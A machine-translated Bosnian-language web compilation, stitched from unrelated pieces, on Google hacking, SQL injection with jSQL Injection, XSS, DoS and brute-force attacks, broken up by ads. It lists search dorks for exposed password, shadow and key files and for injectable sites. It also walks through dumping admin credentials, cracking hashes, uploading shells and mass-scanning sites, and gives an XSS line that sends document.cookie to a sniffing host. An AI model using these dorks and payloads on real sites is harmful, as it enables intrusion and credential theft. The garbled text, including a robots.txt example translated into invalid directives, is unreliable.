/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Svaki od ovih fajlova možemo pronaći koristeći Google, dodatno koristeći riječi index of ili inurl sa imenom datoteke u traci za pretraživanje: možemo pronaći web lokacije sa ranjivim skriptama, na primjer:

allinurl:/random_banner/index.cgi

Uz dodatno znanje, haker bi mogao iskoristiti ranjivost skripte i iskoristiti je da prisili skriptu da posluži bilo koju datoteku pohranjenu na serveru. Na primjer fajl lozinke.

Kako se zaštititi od hakiranja putem Google-a.

1. Nemojte postavljati važne podatke na WEB server.

Čak i ako ste privremeno objavili podatke, možete ih zaboraviti ili će neko imati vremena da pronađe i uzme te podatke prije nego što ih izbrišete. Ne radi to. Postoji mnogo drugih načina za prijenos podataka koji ih štite od krađe.

2. Provjerite svoju web stranicu.

Koristite opisane metode da istražite svoju web stranicu. Povremeno provjeravajte svoju web lokaciju za nove metode koje se pojavljuju na stranici http://johnny.ihackstuff.com. Zapamtite da ako želite automatizirati svoje radnje, morate dobiti posebnu dozvolu od Googlea. Ako pažljivo pročitate http://www.google.com/terms_of_service.html, tada ćete vidjeti frazu: Ne smijete slati automatske upite bilo koje vrste Google-ovom sistemu bez izričitog prethodnog odobrenja Google-a.

3. Možda vam neće trebati Google za indeksiranje vaše stranice ili njenog dijela.

Google vam omogućava da uklonite link do vaše stranice ili njenog dijela iz baze podataka, kao i da uklonite stranice iz keša. Osim toga, možete zabraniti pretragu slika na vašoj web-lokaciji, zabraniti prikaz kratkih fragmenata stranica u rezultatima pretraživanja. Sve mogućnosti brisanja stranice opisane su na stranici http://www.google.com/remove.html. Da biste to učinili, morate potvrditi da ste zaista vlasnik ove stranice ili umetnuti oznake na stranicu ili

4. Koristite robots.txt

Poznato je da pretraživači gledaju u datoteku robots.txt u korijenu stranice i ne indeksiraju one dijelove koji su označeni riječju Disallow. Ovo možete koristiti da spriječite indeksiranje dijela stranice. Na primjer, da biste izbjegli indeksiranje cijele stranice, kreirajte robots.txt datoteku koja sadrži dva reda:

Korisnički agent: *
zabraniti: /

Šta se još dešava

Da vam život ne izgleda kao med, reći ću na kraju da postoje sajtovi koji prate one ljude koji gore navedenim metodama traže rupe u skriptama i WEB serveri. Primjer takve stranice je

Dodatak.

Malo slatko. Isprobajte nešto od sljedećeg za sebe:

1. #mysql dump filetype:sql - traži dumpove baze podataka mySQL podaci
2. Sažetak izvještaja o ranjivosti domaćina - pokazaće vam koje su ranjivosti drugi ljudi pronašli
3. phpMyAdmin radi na inurl:main.php - ovo će prisilno zatvoriti kontrolu preko phpmyadmin panela
4. Nije za distribuciju povjerljivo
5. Zahtjev Details Control Tree Server Variables
6. Trčanje u dječjem načinu rada
7. Ovaj izvještaj je generirao WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs - možda nekome trebaju konfiguracijski fajlovi firewall-a? :)
10. intitle:index.of finances.xls - hmm....
11. intitle:Indeks dbconvert.exe ćaskanja - icq evidencije ćaskanja
12. intext: Analiza saobraćaja Tobias Oetiker
13. intitle: Statistika upotrebe za Generirano od strane Webalizera
14. intitle: statistika napredne web statistike
15. intitle:index.of ws_ftp.ini - ws ftp konfiguracija
16. inurl:ipsec.secrets sadrži zajedničke tajne - tajni ključ - dobar pronalazak
17. inurl:main.php Dobrodošli u phpMyAdmin
18. inurl:server-info Informacije o Apache serveru
19. site:edu admin ocjene
20. ORA-00921: neočekivani kraj SQL naredbe - dobiti staze
21. intitle:index.of trillian.ini
22. intitle: Indeks pwd.db
23. intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle:Indeks .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30. intitle:index.of secring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

  • "Hakiranje mit Google"
  • Centar za obuku "Informzaschita" http://www.itsecurity.ru - vodeći specijalizovani centar u oblasti obrazovanja sigurnost informacija(Licenca Moskovskog komiteta za obrazovanje br. 015470, državna akreditacija br. 004251). Jedini ovlašteni centar za obuku Internet Security Systems i Clearswift u Rusiji i zemljama ZND. Ovlašćeni Microsoft centar za obuku (Sigurnosna specijalizacija). Programi obuke su koordinirani sa Državnom tehničkom komisijom Rusije, FSB (FAPSI). Potvrde o obuci i državna dokumenta o usavršavanju.

    SoftKey je jedinstvena usluga za kupce, programere, dilere i pridružene partnere. Osim toga, ovo je jedna od najboljih online prodavnica softvera u Rusiji, Ukrajini, Kazahstanu, koja kupcima nudi širok asortiman, mnogo načina plaćanja, brzu (često trenutnu) obradu narudžbi, praćenje procesa ispunjenja narudžbi u ličnom dijelu, razne popuste iz trgovine i proizvođača ON.

    Pokrenite preuzetu datoteku dvostruki klik(Mora imati virtuelna mašina ).

    3. Anonimnost prilikom provjere stranice za SQL injekcije

    Postavljanje Tor i Privoxy u Kali Linuxu

    [Odjeljak u razvoju]

    Postavljanje Tor i Privoxy na Windows

    [Odjeljak u razvoju]

    Postavke proxyja za jSQL Injection

    [Odjeljak u razvoju]

    4. Provjera stranice za SQL injekciju s jSQL injekcijom

    Rad sa programom je izuzetno jednostavan. Samo unesite adresu stranice i pritisnite ENTER.

    Sljedeći snimak ekrana pokazuje da je stranica ranjiva na tri vrste SQL injekcija odjednom (informacije o njima su naznačene u donjem desnom kutu). Klikom na nazive injekcija možete promijeniti metodu koja se koristi:

    Također, već smo prikazali postojeće baze podataka.

    Možete vidjeti sadržaj svake tabele:

    Obično su najzanimljiviji dio tabela administratorski akreditivi.

    Ako imate sreće i pronašli ste podatke administratora, onda je prerano za radovanje. Također morate pronaći admin panel, gdje ćete unijeti ove podatke.

    5. Potražite administratore pomoću jSQL injekcije

    Da biste to učinili, idite na sljedeću karticu. Ovdje nas čeka lista mogućih adresa. Možete odabrati jednu ili više stranica za provjeru:

    Pogodnost je što ne morate koristiti druge programe.

    Nažalost, nema mnogo nemarnih programera koji čuvaju lozinke u čistom tekstu. Vrlo često u nizu lozinke vidimo nešto slično

    8743b52063cd84097a65d1633f5c74f5

    Ovo je heš. Možete ga dešifrirati grubom silom. I… jSQL Injection ima ugrađeni brute-forcer.

    6. Brute-forcing heš sa jSQL injekcijom

    Nesumnjiva pogodnost je što ne morate tražiti druge programe. Postoji podrška za mnoge od najpopularnijih hashova.

    Ovo nije najbolja opcija. Da biste postali guru u dešifrovanju heševa, preporučuje se knjiga "" na ruskom.

    Ali, naravno, kada nema drugog programa pri ruci ili nema vremena za učenje, dobro će doći jSQL Injection sa ugrađenom brute-force funkcijom.

    Postoje postavke: možete podesiti koji znakovi su uključeni u lozinku, raspon dužine lozinke.

    7. Operacije datoteka nakon detekcije SQL injekcije

    Osim operacija s bazama podataka - čitanje i modificiranje istih, ako se otkriju SQL injekcije, mogu se izvršiti sljedeće operacije datoteka:

    • čitanje datoteka na serveru
    • učitavanje novih fajlova na server
    • učitavanje školjki na server

    I sve je to implementirano u jSQL Injection!

    Postoje ograničenja - SQL server mora imati privilegije datoteka. Razumno administratori sistema oni su onemogućeni i imaju pristup sistem podataka ne može se dobiti.

    Prisutnost privilegija datoteka je dovoljno lako provjeriti. Idite na jednu od kartica (čitanje datoteka, kreiranje ljuske, učitavanje nove datoteke) i pokušajte izvršiti jednu od navedenih operacija.

    Još jedna vrlo važna napomena - moramo znati tačnu apsolutnu putanju do datoteke sa kojom ćemo raditi - inače ništa neće raditi.

    Pogledajte sljedeći snimak ekrana:

    Na svaki pokušaj rada na fajlu odgovara: Nema privilegija FILE(bez privilegija datoteka). I tu se ništa ne može učiniti.

    Ako umjesto toga imate drugu grešku:

    Problem sa pisanjem u [directory_name]

    To znači da ste pogrešno naveli apsolutnu putanju na koju želite da upišete datoteku.

    Da bi se pretpostavio apsolutni put, mora se barem znati operativni sistem na kojem server radi. Da biste to učinili, prijeđite na karticu Mreža.

    Takav unos (string Win64) daje nam razloga da pretpostavimo da imamo posla sa Windows OS:

    Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Veza: Keep-Alive Metod: HTTP/1.1 200 OK Dužina sadržaja: 353 Datum: pet, 11. decembar 2015. 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

    Ovdje imamo neki Unix (*BSD, Linux):

    Transfer-Encoding: chunked Datum: pet, 11. decembar 2015. 11:57:02 GMT Metoda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Veza: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

    I ovdje imamo CentOS:

    Metoda: HTTP/1.1 200 OK Ističe: čet, 19. novembar 1981. 08:52:00 GMT Set-kolačić: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Veza: Keep-alive X-Cache-Lookup: MISS sa t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS od t1.hoster.ru Cache-Control: nema skladištenja, nema predmemorije, mora se ponovo potvrditi, post-check=0, pre-check=0 Pragma: nema predmemorije Datum: pet, 11. decembar 2015. 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

    Na Windows-u, tipična fascikla web lokacije je C:\Server\data\htdocs\. Ali, u stvari, ako je neko "smislio" da napravi server na Windows-u, onda, vrlo verovatno, ta osoba nije čula ništa o privilegijama. Stoga biste trebali početi pokušavati direktno iz direktorija C: / Windows /:

    Kao što vidite, prvi put je sve prošlo savršeno.

    Ali same ljuske za jSQL Injection izazivaju moje sumnje. Ako imate privilegije za fajlove, onda možete prenijeti nešto sa web sučeljem.

    8. Grupna provjera mjesta za SQL injekcije

    Čak i jSQL Injection ima ovu funkciju. Sve je krajnje jednostavno - prenesite listu stranica (može se uvesti iz datoteke), odaberite one koje želite provjeriti i kliknite na odgovarajuće dugme da započnete operaciju.

    Izlaz putem jSQL injekcije

    jSQL Injection je dobar, moćan alat za pronalaženje i zatim korištenje SQL injekcija koje se nalaze na web lokacijama. Njegove nesumnjive prednosti: jednostavnost korištenja, ugrađene povezane funkcije. jSQL Injection može biti najbolji prijatelj početnika kada analizira web stranice.

    Od nedostataka bih istakao nemogućnost uređivanja baza podataka (barem ja nisam pronašao ovu funkcionalnost). Kao i kod svih alata sa grafičkim interfejsom, nemogućnost upotrebe u skriptama može se pripisati nedostacima ovog programa. Ipak, moguća je i određena automatizacija u ovom programu - zahvaljujući ugrađenoj funkciji masovne provjere lokacije.

    jSQL Injection je mnogo praktičniji za korištenje od sqlmap. Ali sqlmap podržava više vrsta SQL injekcija, ima opcije zaštitnog zida datoteka i neke druge karakteristike.

    Zaključak: jSQL Injection je najbolji prijatelj hakera početnika.

    Pomoć za ovaj program možete pronaći u Kali Linux Enciklopediji na ovoj stranici: http://kali.tools/?p=706

    Odlučio sam da malo popričam o informacionoj sigurnosti. Članak će biti koristan za programere početnike i one koji su tek počeli raditi Frontend razvoj. Šta je problem?

    Mnogi programeri početnici su toliko ovisni o pisanju koda da potpuno zaborave na sigurnost svog rada. I što je najvažnije, zaboravljaju na takve ranjivosti kao što je SQL upit, XXS. Oni također smišljaju jednostavne lozinke za svoje administrativne panele i podvrgnuti su gruboj sili. Šta su to napadi i kako ih izbjeći?

    SQL injekcija

    SQL injekcija je najčešći tip napada na bazu podataka koji se izvodi pomoću SQL upita za određeni DBMS. Mnogi ljudi, pa čak i velike kompanije pate od takvih napada. Razlog je greška programera pri pisanju baze podataka i, zapravo, SQL upita.

    Napad tipa SQL injekcije je moguć zbog nepravilne obrade ulaznih podataka koji se koriste u SQL upitima. Sa uspješnim napadom od strane hakera, rizikujete da izgubite ne samo sadržaj baza podataka, već i lozinke i logove administrativnog panela. I ovi podaci će biti sasvim dovoljni da u potpunosti preuzmete stranicu ili izvršite nepovratna prilagođavanja na njoj.

    Napad se može uspješno reprodukovati u skriptama napisanim u PHP, ASP, Perl i drugim jezicima. Uspjeh takvih napada više ovisi o tome koji se DBMS koristi i kako se implementira sam scenario. U svijetu postoji mnogo ranjivih lokacija za SQL injekcije. Ovo je lako provjeriti. Dovoljno je upisati "dorks" - to su posebni zahtjevi za pronalaženje ranjivih lokacija. Evo nekih od njih:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Kako ih koristiti? Dovoljno je da ih unesete u Google ili Yandex pretraživač. Pretraživač će vam dati ne samo ranjivu stranicu, već i stranicu za ovu ranjivost. Ali nećemo stati na tome i uvjeriti se da je stranica zaista ranjiva. Za ovo je dovoljno staviti jedan navodnik “‘” iza vrijednosti “id=1”. Ovako nešto:

    • inurl:games.php?id=1'

    I stranica će nam dati grešku u vezi s SQL upitom. Šta dalje treba našem hakeru?

    A onda mu treba baš ovaj link na stranicu sa greškom. Zatim se rad na ranjivosti u većini slučajeva odvija u distribuciji "Kali linux" sa svojim uslužnim programima za ovaj dio: uvođenje injekcionog koda i izvođenje potrebnih operacija. Kako će se to dogoditi, ne mogu vam reći. Ali informacije o tome možete pronaći na internetu.

    XSS Attack

    Ova vrsta napada se izvodi na Kolačići. Oni, zauzvrat, veoma vole spašavanje korisnika. Zašto ne? Kako bez njih? Uostalom, zahvaljujući kolačićima, ne unosimo lozinku sa Vk.com ili Mail.ru stotinu puta. I malo je onih koji ih odbijaju. Ali na internetu se za hakere često pojavljuje pravilo: koeficijent pogodnosti je direktno proporcionalan koeficijentu nesigurnosti.

    Za implementaciju XSS napada, našem hakeru je potrebno znanje JavaScripta. Jezik je na prvi pogled vrlo jednostavan i bezopasan, jer nema pristup kompjuterskim resursima. Haker može da radi sa JavaScript-om samo u pretraživaču, ali to je dovoljno. Na kraju krajeva, glavna stvar je unijeti kod na web stranicu.

    Neću ulaziti u detalje o procesu napada. Reći ću samo osnove i značenje kako se to događa.

    Haker može dodati JS kod na neki forum ili knjigu gostiju:

    Skripte nas preusmjeravaju na zaraženu stranicu na kojoj će se izvršavati kod: bilo da se radi o njuškanju, nekoj vrsti pohrane ili eksploataciji koja će na neki način ukrasti naše kolačiće iz keša.

    Zašto JavaScript? Jer JavaScript je odličan s web zahtjevima i ima pristup kolačićima. Ali ako će nas naša skripta prebaciti na neku stranicu, korisnik će to lako primijetiti. Ovdje haker koristi lukaviju opciju - jednostavno unese kod u sliku.

    Img=novaSlika();

    Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

    Jednostavno kreiramo sliku i dodijelimo joj našu skriptu kao adresu.

    Kako se zaštititi od svega ovoga? Vrlo jednostavno - nemojte pratiti sumnjive linkove.

    DoS i DDos napadi


    DoS (od engleskog Denial of Service - uskraćivanje usluge) hakerski napad na kompjuterskom sistemu kako bi se on doveo do kvara. Ovo je stvaranje takvih uslova pod kojima savjesni korisnici sistema ne mogu pristupiti pruženom sistemski resursi(serveri), ili je ovaj pristup otežan. Kvar sistema takođe može biti korak ka njegovom hvatanju ako, u hitnoj situaciji, softver daje bilo kakvu kritičnu informaciju: na primer, verziju, deo programskog koda, itd. Ali najčešće je to mera ekonomski pritisak: gubitak jednostavne usluge koja stvara prihod. Računi od provajdera ili mjere za izbjegavanje napada značajno pogađaju "metu" u džepu.Trenutno su DoS i DDoS napadi najpopularniji, jer vam omogućavaju da dovedete do kvara gotovo svaki sistem bez ostavljanja pravno značajnih dokaza.

    Koja je razlika između DoS i DDos napada?

    DoS je napad izgrađen na pametan način. Na primjer, ako server ne provjeri ispravnost dolaznih paketa, tada haker može uputiti takav zahtjev koji će biti obrađen zauvijek i neće biti dovoljno vremena procesora za rad s drugim konekcijama. Shodno tome, kupci će dobiti odbijenicu za uslugu. Ali neće uspjeti preopteretiti ili onemogućiti velike poznate stranice na ovaj način. Naoružani su prilično širokim kanalima i super-moćnim serverima koji se lako mogu nositi s takvim preopterećenjem.

    DDoS je zapravo isti napad kao i DoS. Ali ako u DoS-u postoji jedan paket zahtjeva, onda u DDoS-u može biti na stotine ili više njih. Čak i serveri za teške uslove rada možda neće moći da se nose sa takvim preopterećenjem. Dat ću vam primjer.

    DoS napad je kada s nekim razgovarate, ali tada se pojavi neka nevaspitana osoba i počne glasno da vrišti. Razgovor je ili nemoguć ili veoma težak. Rešenje: pozvati obezbeđenje, koje će smiriti i izvesti osobu iz sobe. DDoS napadi su kada na hiljade takvih nevaspitanih ljudi uleti. U ovom slučaju, čuvari neće moći sve izvrnuti i odvesti.

    DoS i DDoS se proizvode od kompjutera, takozvanih zombija. Radi se o kompjuterima korisnika koje su hakirali hakeri koji ni ne sumnjaju da je njihova mašina uključena u napad na bilo koji server.

    Kako se zaštititi od ovoga? Općenito, nema šanse. Ali možete zakomplikovati zadatak hakera. Da biste to učinili, morate odabrati dobar hosting sa moćnim serverima.

    Napad grubom silom

    Programer može smisliti mnogo sistema za zaštitu od napada, u potpunosti pregledati skripte koje smo napisali, provjeriti web lokaciju na ranjivosti itd. Ali kada dođe do poslednjeg koraka izgleda sajta, odnosno kada se samo stavi lozinka na admin panel, on može zaboraviti na jednu stvar. Lozinka!

    Izričito se ne preporučuje postavljanje jednostavne lozinke. Može biti 12345, 1114457, vasya111, itd. Ne preporučuje se postavljanje lozinki kraće od 10-11 znakova. U suprotnom, možete biti izloženi najčešćem i nesloženom napadu - Brute Force.

    Brute force je brute force napad baziran na rječniku koristeći posebne programe. Rječnici mogu biti različiti: latinski, sortiranje po brojevima, recimo do nekog raspona, mješoviti (latinica + brojevi), a postoje čak i rječnici sa jedinstvenim simbolima @#4$%&*~~`'”\ ? itd.

    Naravno, ovu vrstu napada je lako izbjeći, dovoljno je smisliti složenu lozinku. Čak vas i captcha može spasiti. A također, ako je vaša stranica napravljena na CMS-u, onda mnogi od njih izračunavaju sličnu vrstu napada i blokiraju IP. Uvijek moramo imati na umu da što je više različitih znakova u lozinki, to ju je teže podići.

    Kako rade hakeri? U većini slučajeva oni ili sumnjaju ili već znaju dio lozinke. Sasvim je logično pretpostaviti da se lozinka korisnika sigurno neće sastojati od 3 ili 5 karaktera. Takve lozinke dovode do čestih hakova. U osnovi, hakeri uzimaju raspon od 5 do 10 znakova i tamo dodaju nekoliko znakova koje vjerovatno znaju unaprijed. Zatim generirajte lozinke sa željenim rasponima. Kali linux distribucija čak ima programe za takve slučajeve. I voila, napad više neće dugo trajati, jer obim rječnika više nije tako velik. Osim toga, haker može koristiti snagu video kartice. Neki od njih podržavaju CUDA sistem, dok se brzina nabrajanja povećava i do 10 puta. I sada vidimo da je napad na jednostavan način sasvim realno. Ali nisu samo web lokacije podvrgnute gruboj sili.

    Dragi programeri, nikada ne zaboravite na sistem sigurnosti informacija, jer danas mnogi ljudi, uključujući i države, pate od takvih vrsta napada. Na kraju krajeva, najveća ranjivost je osoba koja uvijek može negdje biti ometena ili negdje previdjeti. Mi smo programeri, ali nismo programirane mašine. Budite uvijek na oprezu, jer gubitak informacija prijeti ozbiljnim posljedicama!